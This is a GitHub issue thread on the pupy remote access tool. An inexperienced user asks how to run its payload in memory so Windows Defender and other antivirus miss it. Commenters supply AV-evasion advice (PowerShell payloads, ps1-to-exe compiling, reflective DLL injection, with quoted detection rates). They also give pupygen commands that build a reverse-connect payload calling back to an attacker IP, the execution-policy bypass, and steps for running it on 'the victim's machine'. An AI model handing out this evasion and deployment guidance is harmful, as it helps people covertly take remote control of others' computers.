### ISSUE TITLE
Help with all-in-memory execution

### ISSUE THREAD

**Issue by ta69** [n1nj4sec/pupy#168]
Could someone please share a script that executes the pupyx86.dll from memory so it won't be blocked/removed by Windows Defender and other AV?

**Comment by quentinhardy** [comment]
Hello,

For bypassing AV, you can use _**ps1_oneliner**_ payload or _**ps1**_ payload for example. See https://github.com/n1nj4sec/pupy/blob/master/pupy/pupygen.py, line 266

**Comment by ta69** [comment]
Thanks a lot! I still have some questions/confusion if you don't mind :)

After generating the payload using:
`python pupygen.py -f ps1 connect --host MYIPADDRESS:443`
The file `payload.ps1` was generated, and this file could be safely put on the Client computer without being removed by Windows Defender.

Then I run
`python pupysh.py`
However, running `info` results in `[ - ] no clients currently connected`, and running
`connect --host MYIPADDRESS:443` results in timeout. 

Am I doing something wrong? Am I supposed to do something with the `payload.ps1` file? Right now I just placed it on the Desktop and did nothing with it

**Comment by n1nj4sec** [comment]
> After generating the payload using:
python pupygen.py -f ps1 connect --host MYIPADDRESS:443
> The file payload.ps1 was generated, and this file could be safely put on the Client computer without being removed by Windows Defender.

>Then I run python pupysh.py
> However, running info results in [ - ] no clients currently connected, and running
connect --host MYIPADDRESS:443 results in timeout.

> Am I doing something wrong? Am I supposed to do something with the payload.ps1 file? Right now I just placed it on the Desktop and did nothing with it

You made my day :)

**Comment by quentinhardy** [comment]
Securityreactions ?! [https://67.media.tumblr.com/[...].gif](https://67.media.tumblr.com/9500d3ad93daa3c975e46a5543264315/tumblr_inline_o9fwri6Cvj1qar3or_500.gif)

**Comment by ta69** [comment]
Feel confused, as someone who's never done anything in any way related to RAT then I don't think my questions and apparently mistakes are _that_ stupid? I mean if you a day ago had no idea what RAT meant, what a payload was, never heard about reflective dll, etc. wouldn't my steps seem somewhat logical? Initially I also thought that after generating the .exe then would just run it on the host (hoping this exe would automatically run on startup), and if generating a dll then perhaps would have to link it with an .exe (but both automatically deleted by Windows Defender), etc. I've never seen a .ps1 file before so not sure how to run it, but yeah, I guess need to run it somehow..

Assuming you don't feel I'm a hopeless case and wasting your time (I guess you can easily tell I won't be able to do any contribution besides maybe some documentation), then I do hope you can provide some more detailed instructions; I'm not a troll, I'd just really like to use this application :)

**Comment by amainyebriggs** [comment]
Another technique I use to bypass antivirus is fine format conversation , which is compiling the .ps1 to exe

**Comment by amainyebriggs** [comment]
Detection rate is 3/54 and Windows defender does not detect it

**Comment by amainyebriggs** [comment]
Or u can generate a puppy.dll and reflectively inject it into memory using winrar or some programs out there 0/54

**Comment by void-in** [comment]
@ta69 The ps1 format is the powershell format which needs to be executed on the target machine using Powershell. Run powershell from the Windows machine, go to the location where you have placed the .ps1 file and run it just like you would run any other script in Windows from a command line. 

![ps1](https://cloud.githubusercontent.com/assets/1746697/18076908/134f73ba-6e9b-11e6-8feb-d7cd6a50a62b.PNG)

You might have to set the execution policy to bypass if it is restricted.

PS C:\ Set-ExecutionPolicy bypass
Then run the ps1 script. Make sure you have the pupysh.py server running on the appropriate port.

**Comment by amainyebriggs** [comment]
Use ps1 to exe compiler to compile ps1 to exe

**Comment by ta69** [comment]
Thanks a lot everyone :)

@amainyebriggs if I put the dll inside some .zip archive, then as soon as the Client open the archive it should be possible to establish a connection? But I guess doing it this way means that if the user extracts the archive then it will get caught by the Windows Defender..?

@void-in I tried to run the powershell like you said, and I get the exact same warning message as in your screenshot. But after running then it's still not possible to connect the client from the server.

I start server using: `python pupysh.py`
Then I get the -- Pupy shell -- welcome message with v1.3 and author info. 

When I try to write `info` then I still get `[ - ] no clients currently connected`
When I try to write `connect --host IPADDROFPCRUNNINGSERVER:443` then I still get timeout. 

The order I used: connect server THEN open ps1 in powershell THEN insert `connect --host MYIPADDRESS:443` in the server terminal. Both the server and the client have a working internet connection.
(I've also tried to run `connect --host IPADDROFPCRUNNINGSERVER:443 -t http`, `connect --host IPADDROFPCRUNNINGSERVER:443 -t ssl`, etc. but they all result in timeout)

**Comment by void-in** [comment]
@ta69 You are doing it wrong. Generate the ps1 file like:
./pupygen.py -f ps1 -o pupy.ps1 connect --host <IP>:<port>

Then start the pupysh.py server as:
./pupysh.py --port <port given in pupygen.py command>

For example:
./pupygen.py -f ps1 -o pupy.ps1 connect --host 10.10.10.1:443
Where 10.10.10.1 is the attacker's IP. Then
./pupysh.py --port 443

Copy the ps1 file to the victim's machine and execute it. Make sure the victim can connect to the attacker's machine on the specified port (e.g. no firewall/IDS/IPS is blocking).

**Comment by ta69** [comment]
Thanks a lot, I think it's almost working. At first I got my IP by googling "my ip address", for which Google returned my public IP address.. I guess I shouldn't use this IP address(?), so I tried to get it by running the `hostname -I` command, and then followed your instructions.

After I start the server (`python pupysh.py --port 443`) I run
```
>> connect --host 192.168.X.XXX:443
[%] Connecting ...
  
>>
```
But nothing happens after that, and typing `info` still shows `no clients currently connected`. I disabled the firewall completely so I don't think there's anything blocking the connection. Any ideas? Maybe I'm still using the wrong IP address?

**Comment by void-in** [comment]
@ta69 Why are you executing connect --host <IP>:443 on the pupy prompt? Take a look at wiki particularly https://github.com/n1nj4sec/pupy/wiki/Generate-payloads to get an idea how pupy works.

**Comment by ta69** [comment]
Oh yes, I misunderstood - I did try to follow the wiki. The reason I ran `connect --host MYIP:443` was because nothing happened after first connecting to the server `python pupysh.py --port 443` and then running the ps1 file with PowerShell.. and when I typed `help` on the server I saw the `connect` command was available.

But the IP address I use (`hostname -I`) and the commands to generate the payload and start the server (the ones you gave me) should be correct and all it takes to get it working? And the reason it's not working must be because the connection is being blocked (which is weird because I disabled the firewall and I don't use any AV software)?

**Comment by void-in** [comment]
@ta69 How have you generated the payload? Don't use public IP addresses for the moment as that would involve port forwarding. Make sure you are able to get a session within your LAN setup by using either two physical machines or VMs, make sure the victim can connect to the attacker's machine on the specified port (run nmap or something), then generate the pupy payload and use connect --host <private IP>:443 and check. Once you are comfortable with the setup, you can extend it to run over the Internet.

**Comment by n1nj4sec** [comment]
You can find more information about your problem [here](https://tools.ietf.org/html/rfc2663), [here](https://tools.ietf.org/html/rfc1122) and [here](https://tools.ietf.org/html/rfc793)

**Comment by ta69** [comment]
@void-in I followed your command `python pupygen.py -f ps1 -o pupy.ps1 connect --host MYUBUNTUIPADDR:443`
I just tried with virtualbox instead of over the internet, and it works great. How would I go about getting it to run over the internet?
